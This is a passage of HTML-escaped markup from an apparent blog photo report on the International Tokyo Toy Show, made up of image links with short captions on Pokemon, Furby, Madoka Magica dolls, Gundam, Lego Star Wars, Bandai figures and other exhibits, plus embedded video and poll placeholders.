href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173227"&gt;&lt;img alt="9075433608_7a454c158c_o" height="523" src="http://farm8.staticflickr.com/7306/9075433608_7a454c158c_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;An area set aside for wheeling n dealing.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173108"&gt;&lt;img alt="9073204649_87b028fe0f_o" height="523" src="http://farm6.staticflickr.com/5332/9073204649_87b028fe0f_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26873/LINE+Official+Accounts.html"&gt;My official LINE account&lt;/a&gt; is now up to 243,600 followers ^o^&lt;br /&gt;&lt;br /&gt;My ID is "@DannyChoo" (dont forget the "@" mark)&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173109"&gt;&lt;img alt="9073205053_d45040661f_o" height="523" src="http://farm4.staticflickr.com/3675/9073205053_d45040661f_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173110"&gt;&lt;img alt="9075434766_9c39cda871_o" height="523" src="http://farm6.staticflickr.com/5329/9075434766_9c39cda871_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Up n coming toy products by Takara Tomy Marketing.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173111"&gt;&lt;img alt="9075435142_da8a6250d9_o" height="523" src="http://farm8.staticflickr.com/7375/9075435142_da8a6250d9_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Megatron from "Transformers : Dark of The Moon".&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173112"&gt;&lt;img alt="9075435682_0c92eb6666_o" height="523" src="http://farm6.staticflickr.com/5454/9075435682_0c92eb6666_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The new &lt;a href="http://www.pokemonxy.com/en-us/root/"&gt;Pokemon X and Y&lt;/a&gt;  launching worldwide on October 12th.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-2MYbmIxzer8"&gt;&lt;img alt="" src="http://img.youtube.com/vi/2MYbmIxzer8/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-2MYbmIxzer8"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173113"&gt;&lt;img alt="9073206811_39b6b9573b_o" height="523" src="http://farm4.staticflickr.com/3757/9073206811_39b6b9573b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Loadsa pokemon plushie up for grabs.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173114"&gt;&lt;img alt="9073207169_f2cb023d36_o" height="523" src="http://farm6.staticflickr.com/5330/9073207169_f2cb023d36_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Terebi de Pokemon Getto! Poké Ball [テレビでポケモンゲット！ モンスターボール] - for those aspiring to become a pokemon master.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-IZgD1QCM4dM"&gt;&lt;img alt="" src="http://img.youtube.com/vi/IZgD1QCM4dM/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-IZgD1QCM4dM"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173115"&gt;&lt;img alt="9075437066_b561e87ed6_o" height="930" src="http://farm3.staticflickr.com/2837/9075437066_b561e87ed6_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Even more goodies at the pokemon corner.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173116"&gt;&lt;img alt="9075437434_67a929c5e9_o" height="523" src="http://farm6.staticflickr.com/5464/9075437434_67a929c5e9_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The new &lt;a href="http://www.takaratomy.co.jp/products/furby/products/index.html"&gt;Furby Japanese edition&lt;/a&gt; works with iPhone and Android.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173117"&gt;&lt;img alt="9075437822_d3d0903dd4_o" height="930" src="http://farm4.staticflickr.com/3697/9075437822_d3d0903dd4_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Protect your family with Nerf.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173118"&gt;&lt;img alt="9075438196_306c4c99ce_o" height="523" src="http://farm8.staticflickr.com/7374/9075438196_306c4c99ce_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Mr. Potato Head is turning Japanese.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-vGtwMMgaCCk"&gt;&lt;img alt="" src="http://img.youtube.com/vi/vGtwMMgaCCk/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-vGtwMMgaCCk"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173119"&gt;&lt;img alt="9075438602_2c11223c21_o" height="523" src="http://farm4.staticflickr.com/3832/9075438602_2c11223c21_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.takaratomy.co.jp/products/dancingfacestand/"&gt;Dancing Face-Stand&lt;/a&gt; makes your phone more..."interesting."&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173120"&gt;&lt;img alt="9073209925_aedc9b7607_o" height="523" src="http://farm4.staticflickr.com/3782/9073209925_aedc9b7607_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Loads of &lt;a href="http://www.takaratomy-arts.co.jp/specials/prettyrhythm/"&gt;Pretty Rhytym&lt;/a&gt; goodies. In Japan many anime targeted at little girls are cleverly crafted to be enjoyed by adults too.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173121"&gt;&lt;img alt="9075439904_d6ebef1e39_o" height="523" src="http://farm4.staticflickr.com/3682/9075439904_d6ebef1e39_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Some of the Pretty Rhythm girls in action below.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-x-dhQXrhx7I"&gt;&lt;img alt="" src="http://img.youtube.com/vi/x-dhQXrhx7I/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-x-dhQXrhx7I"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173122"&gt;&lt;img alt="9073211089_5dbbca6c2f_o" height="523" src="http://farm3.staticflickr.com/2861/9073211089_5dbbca6c2f_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173123"&gt;&lt;img alt="9073211583_2541bba6d8_o" height="930" src="http://farm3.staticflickr.com/2870/9073211583_2541bba6d8_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Hatsune Miku X Licca-chan.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173124"&gt;&lt;img alt="9075441276_e560a71bee_o" height="930" src="http://farm3.staticflickr.com/2805/9075441276_e560a71bee_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;This post contains a poll, &lt;a href="http://www.dannychoo.com/en/posts/26967#poll-2657"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173125"&gt;&lt;img alt="9075441694_064bb24252_o" height="523" src="http://farm3.staticflickr.com/2825/9075441694_064bb24252_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;More 1/6 scale dolls.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173126"&gt;&lt;img alt="9075442164_ff181c13ac_o" height="523" src="http://farm3.staticflickr.com/2828/9075442164_ff181c13ac_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Huge plarail [プラレール] diorama.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173127"&gt;&lt;img alt="9075442524_2607faf835_o" height="930" src="http://farm3.staticflickr.com/2854/9075442524_2607faf835_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.madoka-magica.com/puella.html"&gt;Madoka Magica movie The Rebellion Story&lt;/a&gt; [叛逆の物語] soon.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173128"&gt;&lt;img alt="9075442904_3035ef4f33_o" height="523" src="http://farm8.staticflickr.com/7288/9075442904_3035ef4f33_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Bored of Transformers, Takara Tomy now do &lt;a href="http://www.takaratomy.co.jp/products/madokamagica/"&gt;Madoka and Homura&lt;/a&gt; with their new doll brand "liccarize."&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173129"&gt;&lt;img alt="9073213909_b31b3b7778_o" height="523" src="http://farm3.staticflickr.com/2848/9073213909_b31b3b7778_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Hungry?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173130"&gt;&lt;img alt="9073214481_59d80fd791_o" height="523" src="http://farm3.staticflickr.com/2840/9073214481_59d80fd791_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://collection.rubies.co.jp/"&gt;Rubie's Japan&lt;/a&gt; Iron Man Mark 42 costume will be available for &lt;a href="http://finance.yahoo.com/currency/convert?amt=1800000&amp;amp;from=JPY&amp;amp;to=USD&amp;amp;submit=Convert"&gt;1,800,000 yen&lt;/a&gt; from mid-September. Any takers?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173131"&gt;&lt;img alt="9073214887_2786833cda_o" height="523" src="http://farm6.staticflickr.com/5458/9073214887_2786833cda_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Hot Toy's Tony Stark Workshop Version 1/6 scale figure.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173133"&gt;&lt;img alt="9075444594_6f012afb12_o" height="523" src="http://farm6.staticflickr.com/5481/9075444594_6f012afb12_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173132"&gt;&lt;img alt="9073215647_7803822267_o" height="930" src="http://farm8.staticflickr.com/7359/9073215647_7803822267_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Variant Play Arts "DC Comics" Batman by Square Enix.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173134"&gt;&lt;img alt="9075445348_3c2989a73c_o" height="523" src="http://farm8.staticflickr.com/7285/9075445348_3c2989a73c_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Char Aznable x Auris collaboration - the &lt;a href="http://netz.jp/char-auris/concept/"&gt;Zeonic Toyota&lt;/a&gt; for all Gundam Fans.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173135"&gt;&lt;img alt="9073216497_228acb8d67_o" height="523" src="http://farm6.staticflickr.com/5537/9073216497_228acb8d67_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Morinaga &amp;amp; Company's booth with a load of noms.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173136"&gt;&lt;img alt="9075446228_b60136d815_o" height="523" src="http://farm6.staticflickr.com/5548/9075446228_b60136d815_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173137"&gt;&lt;img alt="9073217331_9938de2cfe_o" height="523" src="http://farm3.staticflickr.com/2845/9073217331_9938de2cfe_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Checking out Drecom's social game "Furusato Jieitai" [ふるさと自衛隊] - illustrated by &lt;a href="http://lilylilyrose.net/"&gt;Mibu Natsuki-sensei&lt;/a&gt; who brought you the &lt;a href="http://tetsudou-musume.net/"&gt;Tetsudou Musume series&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173138"&gt;&lt;img alt="9073217973_bdc511fcb1_o" height="523" src="http://farm6.staticflickr.com/5538/9073217973_bdc511fcb1_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Tis officially approved by Japan's Self Defense Force too.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173144"&gt;&lt;img alt="9073218363_cea3011b01_o" height="523" src="http://farm4.staticflickr.com/3674/9073218363_cea3011b01_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;The new Mutant Ninja Turtles will begin airing in Japan next spring. How many of you have seen the original anime?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173139"&gt;&lt;img alt="9073218817_a9d3322566_o" height="523" src="http://farm8.staticflickr.com/7424/9073218817_a9d3322566_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173319"&gt;&lt;img alt="9073219171_0d8e4d358e_o" height="523" src="http://farm8.staticflickr.com/7317/9073219171_0d8e4d358e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;At the &lt;a href="http://bushiroad.fm/"&gt;Bushiroad&lt;/a&gt; booth, big boss &lt;a href="http://www.dannychoo.com/en/post/25891/Takaaki+Kidani.html"&gt;Kidani-san&lt;/a&gt; gives a presentation on their upcoming title &lt;a href="http://fc-buddyfight.com/"&gt;Buddy Fight&lt;/a&gt;. More info due to be released in October.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173142"&gt;&lt;img alt="9073219557_6eb8574cd1_o" height="523" src="http://farm6.staticflickr.com/5539/9073219557_6eb8574cd1_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;From left to right - &lt;a href="http://www.corocoro.tv/"&gt;CoroCoro Comic&lt;/a&gt; Chief Editor Murakami-san, Big Boss Kidani-san and &lt;a href="http://www.olm.co.jp/en/olm/index.html"&gt;O.L.M&lt;/a&gt; CEO Okuno-san.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173148"&gt;&lt;img alt="9075449370_6fed63c1b2_o" height="523" src="http://farm8.staticflickr.com/7348/9075449370_6fed63c1b2_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Bushiroad have the rights to My Little Pony in Japan - I hear the series is popular among American adults? Is it horses having hanky panky?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173143"&gt;&lt;img alt="9075449800_95fa5f0236_o" height="930" src="http://farm3.staticflickr.com/2833/9075449800_95fa5f0236_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173145"&gt;&lt;img alt="9073220779_bf11bb5c90_o" height="523" src="http://farm3.staticflickr.com/2808/9073220779_bf11bb5c90_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Huge lego crafts of Luke Skywalker and Darth Vader at the Lego booth.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173146"&gt;&lt;img alt="9075450626_9f28007d6d_o" height="523" src="http://farm6.staticflickr.com/5446/9075450626_9f28007d6d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;More Star Wars Lego goodies.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173147"&gt;&lt;img alt="9075451000_a363e575f5_o" height="523" src="http://farm4.staticflickr.com/3667/9075451000_a363e575f5_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173149"&gt;&lt;img alt="9073221981_aaf53f9d68_o" height="523" src="http://farm8.staticflickr.com/7387/9073221981_aaf53f9d68_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Evangelion jigsaw puzzle in many different shapes and sizes.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173150"&gt;&lt;img alt="9075451844_89990868b1_o" height="523" src="http://farm6.staticflickr.com/5472/9075451844_89990868b1_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;This post contains a poll, &lt;a href="http://www.dannychoo.com/en/posts/26967#poll-2656"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173151"&gt;&lt;img alt="9073222869_9c2661eb3e_o" height="523" src="http://farm6.staticflickr.com/5457/9073222869_9c2661eb3e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.4dcityscape.com/"&gt;4D City Scape Time Puzzle Tokyo&lt;/a&gt; - for those interested in learning how Tokyo looked like in the past and present.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173188"&gt;&lt;img alt="9073223353_43e5fa092b_o" height="523" src="http://farm3.staticflickr.com/2882/9073223353_43e5fa092b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;3D puzzle of famous architectures by Heart Art Collection.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173152"&gt;&lt;img alt="9073223937_1399805e14_o" height="523" src="http://farm6.staticflickr.com/5466/9073223937_1399805e14_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Spongebob Squarepants instrument and plushies.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173153"&gt;&lt;img alt="9073224347_7afcf38c61_o" height="523" src="http://farm8.staticflickr.com/7423/9073224347_7afcf38c61_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;All kinds of R/C cars and helicopters.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173154"&gt;&lt;img alt="9073224835_0aecf9bbb4_o" height="523" src="http://farm8.staticflickr.com/7376/9073224835_0aecf9bbb4_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173155"&gt;&lt;img alt="9075454818_2dfb81b5ec_o" height="523" src="http://farm6.staticflickr.com/5527/9075454818_2dfb81b5ec_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Gintama, Naruto, One Piece and Precure mini-posters.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173159"&gt;&lt;img alt="9075455298_54005bc959_o" height="523" src="http://farm8.staticflickr.com/7338/9075455298_54005bc959_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Shingeki no Jigsaw Puzzle.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173157"&gt;&lt;img alt="9073226229_ea13c503b3_o" height="523" src="http://farm6.staticflickr.com/5528/9073226229_ea13c503b3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173163"&gt;&lt;img alt="9075456216_74580f77ef_o" height="523" src="http://farm4.staticflickr.com/3747/9075456216_74580f77ef_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Now entering the Bandai booth.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173167"&gt;&lt;img alt="9073226977_dc8df59d3d_o" height="523" src="http://farm4.staticflickr.com/3681/9073226977_dc8df59d3d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Soft vinyl kaiju figures.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173169"&gt;&lt;img alt="9073227367_70d210a2ea_o" height="523" src="http://farm8.staticflickr.com/7356/9073227367_70d210a2ea_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173171"&gt;&lt;img alt="9073227783_785876430d_o" height="523" src="http://farm6.staticflickr.com/5482/9073227783_785876430d_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Sentai series - &lt;a href="http://www.tv-asahi.co.jp/kyouryu/"&gt;Zyuden Sentai Kyoryuger&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173173"&gt;&lt;img alt="9075457822_dfa0f58321_o" height="523" src="http://farm6.staticflickr.com/5506/9075457822_dfa0f58321_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;How many of you played Bandai's arcade card game &lt;a href="http://www.aikatsu.net/"&gt;Aikatsu!&lt;/a&gt; [アイカツ!]?&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173175"&gt;&lt;img alt="9075458252_1ae69f2e10_o" height="523" src="http://farm8.staticflickr.com/7315/9075458252_1ae69f2e10_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Life-size Monsters, Inc.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173178"&gt;&lt;img alt="9075458678_da697a5bb3_o" height="523" src="http://farm6.staticflickr.com/5533/9075458678_da697a5bb3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;HG build Gunplas on display.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173180"&gt;&lt;img alt="9075459168_1dbdd94529_o" height="523" src="http://farm6.staticflickr.com/5337/9075459168_1dbdd94529_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://yamato2199.net/"&gt;Space Battleship Yamato 2199&lt;/a&gt; booth featuring a huge replica of Yamato.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-0BGu9HESMuI"&gt;&lt;img alt="" src="http://img.youtube.com/vi/0BGu9HESMuI/mqdefault.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This post contains a video, &lt;a href="http://www.dannychoo.com/en/posts/26967#youtube-0BGu9HESMuI"&gt;click here to view&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173182"&gt;&lt;img alt="9075459934_23815fc6d6_o" height="525" src="http://farm6.staticflickr.com/5333/9075459934_23815fc6d6_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Smart pants for your smart phones...&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173184"&gt;&lt;img alt="9073230565_497d8afd1e_o" height="523" src="http://farm3.staticflickr.com/2814/9073230565_497d8afd1e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Wide assortment of Peko-chan goodies at the Fujiya booth.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173186"&gt;&lt;img alt="9075460964_243759a1f5_o" height="523" src="http://farm8.staticflickr.com/7381/9075460964_243759a1f5_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173191"&gt;&lt;img alt="9075461412_0c85090448_o" height="523" src="http://farm6.staticflickr.com/5331/9075461412_0c85090448_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Exhibitors from outside Japan also gathered for the event - many being OEM.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173193"&gt;&lt;img alt="9073231957_f2464ec516_o" height="523" src="http://farm3.staticflickr.com/2813/9073231957_f2464ec516_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173197"&gt;&lt;img alt="9075462390_a697860996_o" height="930" src="http://farm4.staticflickr.com/3741/9075462390_a697860996_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;Macross Sheryl jigsaw puzzle illustrated by &lt;a href="http://www.pixiv.net/member.php?id=98777"&gt;HIRONOX-sensei&lt;/a&gt;.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173195"&gt;&lt;img alt="9075462810_7c701973bc_o" height="523" src="http://farm4.staticflickr.com/3674/9075462810_7c701973bc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173199"&gt;&lt;img alt="9075463214_993a4aa3ff_o" height="523" src="http://farm6.staticflickr.com/5548/9075463214_993a4aa3ff_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173201"&gt;&lt;img alt="9075463754_52300e4827_o" height="523" src="http://farm3.staticflickr.com/2842/9075463754_52300e4827_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Zuttomo Candy-ful Nail - DIY nail art kit for kids.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173203"&gt;&lt;img alt="9073234317_1b676f976c_o" height="523" src="http://farm3.staticflickr.com/2809/9073234317_1b676f976c_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;I've always thought that Sylvanian Families were cute but never ended getting any ^^;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173204"&gt;&lt;img alt="9073234757_47d4e60b69_o" height="523" src="http://farm6.staticflickr.com/5506/9073234757_47d4e60b69_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173161"&gt;&lt;img alt="9075465086_41620ce9f1_o" height="930" src="http://farm8.staticflickr.com/7313/9075465086_41620ce9f1_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;As Tokyo Toy Show is targeted for younger audiences, products like baby strollers were also on display.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173207"&gt;&lt;img alt="9075465486_2776f346f1_o" height="523" src="http://farm3.staticflickr.com/2886/9075465486_2776f346f1_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Fisher Price also had a booth.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173210"&gt;&lt;img alt="9075465902_ba825c6516_o" height="523" src="http://farm6.staticflickr.com/5472/9075465902_ba825c6516_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Hello-kitty stuff for the wee lads.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26967/International+Tokyo+Toy+Show.html#image_173208"&gt;&lt;img alt="9075466296_5c944e04a8_o" height="523" src="http://farm4.staticflickr.com/3715/9075466296_5c944e04a8_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br 